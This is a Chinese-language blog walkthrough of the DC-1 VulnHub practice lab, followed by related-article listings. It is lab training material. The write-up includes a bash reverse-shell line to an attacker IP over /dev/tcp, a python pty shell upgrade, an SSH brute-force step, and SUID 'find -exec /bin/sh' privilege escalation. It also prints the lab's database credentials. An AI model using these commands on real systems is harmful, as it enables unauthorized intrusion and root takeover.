DC-1入狱级别思路

最新推荐文章于 2024-02-05 00:16:00 发布
最新推荐文章于 2024-02-05 00:16:00 发布
阅读量338 收藏 2
点赞数
分类专栏: 安全 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44537595/article/details/108871288
版权
  1. Nmap扫描在线主机,找到DC-1的ip地址

     2.扫描其端口号

 

  3. 相应端口进行处理(如:访问80端口、暴力破解22端口)

 

 扫描目录

 

访问相应的目录,查看是否存在敏感信息

 

可以看到明显版本信息

  1. 利用metasploit进行反弹shell的攻击,获取shell

  2. 找到了第一个flag1

    查看下内容

需要我们去找个配置文件

在sites/default/目录下的setting_defaults.php文件中

 

内容

flag2

 * Brute force and dictionary attacks aren't the

 * only ways to gain access (and you WILL need access).

 * What can you do with these credentials?

 *

 */

 

$databases = array (

  'default' =>

  array (

    'default' =>

    array (

      'database' => 'drupaldb',

      'username' => 'dbuser',

      'password' => 'R0ck3t',

      'host' => 'localhost',

      'port' => '',

      'driver' => 'mysql',

获取到了数据库信息,尝试去登陆mysql

失败,因为httpshell是短暂连接,而mysql建立连接需要长连接

通过反弹shell

/bin/bash -I >& /dev/tcp/本主机ip/端口号  0>&1

发现也不能

所以采用第二种办法

输入python -v,发现系统自带Python 2.7.3,通过pty.spawn()获得交互式shell

于是我们进行了又一轮的渗透大战

进入shell  ,输入shell  即可

输入以下命令则具有/bin/bash权限le

python -c "import pty;pty.spawn('/bin/bash')"

登陆mysql

首先查看所存在的数据库

 

然后查看drupaldb里所存在的表

欸有我去,这是什么,用户表啊,看下他不过分吧

密文哈

给我很大的惊吓,但不要怕

方法一

独立创建个账户,利用脚本

用户创建成功

当再次查询表中的数据时,发现如下

 

创建好后,去登陆网站

在网站中浏览时发现flag3

 

意思让我们去读取账号密码文件。

于是我进入home目录下,读取flag4.txt

他不让我进入root目录

 

 

通过ssh获取shell试试

暴力破解

 

获取出来账号密码

连接

 

 

登陆进来了

权限不够,提权

利用find方法

Find / -perm -4000   查找只有可读权限的文件或命令

然后如下提权

Find ./ aaa -exec ‘/bin/sh’ \;

最后进入到root目录下,读取flag5

学习总结:

收集信息(比如敏感文件),利用收集到的信息获取shell,然后提权,提权方法:通过find命令进行提权,其次就是通过暴力破解获取shell,然后提权进入到root下

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

weixin_44537595
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DC-1实战手把手教详解
逆旅行人的博客
09-04 3184
DC-1 是一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 它旨在为初学者带来挑战,但它的简单程度取决于您的技能和知识以及您的学习能力。 要成功完成这一挑战,您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。 有多种获得 root 的方法,但是,我已经包含了一些包含初学者线索的标志。 总共有五个标志,但最终目标是在 root 的主目录中找到并读取标志。您甚至不需要
DC-1详解(绝对的详细!)
学习!冲冲冲!
10-23 9068
DC-1靶机整个渗透过程(B站可以看小飞侠的视频真的好!) 将kali和DC-1的网络均设置为NAT模式 获取kali的IP地址 ifconfig 查看IP命令需要记住 扫描此IP段中存活的靶机IP arp-scan -l 根据靶机MAC地址来确认其IP地址 用masscan快速扫描DC-1开放的端口 masscan --rate10000 -p 1-65535 192.168.220.131 --rate10000 用来定义扫描速率 -p 1-65535 定义扫描从1-6553
靶机2 DC-1(过程超详细)
honest_gg的博客
09-09 1458
本靶机通过使用msf来getshell,然后进行mysql数据库的查询、更新,最后完成suid提权获取最终的flag
DC-1靶场搭建及渗透实战详细过程
baijiaofei的博客
08-24 1584
DC靶场实战过程
DC1(VulnHub)
最新发布
carmi的博客
02-05 388
DC1(VulnHub) 1 2 3 4、flag1提示 flag1提示:Every good CMS needs a config file - and so do you. 5、flag2提示 flag2提示:Brute force and dictionary attacks aren't the only ways to gain access (and you WILL ne...
DC-DC PCB layout 指导.docx
06-18
1. Bad layout 会导致 EMI 干扰,降低 DC-DC 的性能。因此,需要尽量减少 layout 的噪声和干扰。 2. 开关大电流回路尽量短信号地和大电流(功率地)单独走线,并在芯片 GND 处单点连接。这样可以减少噪声和干扰,...
DC-DC变换器Simulink仿真模型
08-07
具体到这个名为"DC_DC_PWM-RECTIFIER1.mdl"的Simulink模型,我们可以推断它是包含脉宽调制(PWM)和整流器功能的DC-DC变换器。PWM技术用于控制开关器件的导通时间,从而改变输出电压的平均值。而整流器则将交流信号...
dc-sdk-examples:DC-SDK开发示例
05-11
"DC-SDK开发示例"是一个专门为开发者设计的项目,旨在帮助他们更好地理解和使用DC-SDK进行3D可视化开发。DC-SDK(可能是"Data Center SDK"或类似的缩写)是一个强大的工具集,用于构建基于Web的三维场景,特别是在...
dc-vue:基于VueCli4.xx和DC-SDK构建的三维应用脚手架,用于开发三维WebGis项目
02-14
"dc-vue"是一个专为开发三维WebGIS项目的脚手架,它基于Vue CLI 4.x版本,并集成了DC-SDK。这个框架的目的是简化和加速开发者构建WebGIS应用程序的过程,使得用户能够更加高效地创建复杂的3D地理信息系统。 Vue CLI...
DC-DC-STM32F1.zip
08-01
标题 "DC-DC-STM32F1.zip" 暗示了这是一个关于使用STM32F103微控制器实现双向DC-DC转换器的项目。2015年全国电子设计竞赛A题可能涉及到了电力转换和能源管理方面的问题,而STM32F103是意法半导体...
DC-1靶场实战详解
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC-1详解
2301_76648294的博客
05-31 213
选出两个带有网站特征的模块,根据rank选择出最有可能成功的模块(即选择excell:优秀的)结合flag3和2的提示,不爆破root密码,和find命令有关。特殊的PERMS将帮助寻找密码,但是你需要—exec类似命令取得到在暗处的东西。为了方便之后的提权命令正常执行,我们利用python转换shell交互式。前一句话的意思是特别的特征。提示:暴力拆解不是获得权限的唯一方式,你还有什么方式?提示:每个完美的cms都需要一个配置文件,你也一样。你能在root权限下找flag吗,不过这应该很难吧。
DC1_靶机_提权_通关_打点_amap
weixin_42786460的博客
08-06 80
DC1_靶机_提权_通关_打点_amap
DC-1靶场搭建及渗透实战详细过程(DC靶场系列)
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-20 4599
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
DC-1靶机渗透(教程以及思路
菜菜的博客
10-20 2906
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
DC系列靶机DC-1
weixin_53067829的博客
07-01 980
DC系列靶机
dc-1 靶机部署并且成功反弹shell
真正的大师,永远都怀着一颗学徒的心。
07-21 425
文章目录一、DC-1下载二、使用步骤1.首先导入DC-1 配置为NAT网络,开机,找到靶机IP。2.nmap查看目标开放端口3.上网查找Drupal7的漏洞信息总结 一、DC-1下载 下载地址:https://download.vulnhub.com/dc/DC-1.zip 二、使用步骤 1.首先导入DC-1 配置为NAT网络,开机,找到靶机IP。 2.nmap查看目标开放端口 3.上网查找Drupal7的漏洞信息 总结 提示:这里对文章进行总结: 例如:以上就是今天要讲的内容,本文仅仅简单介绍了p
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放...以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值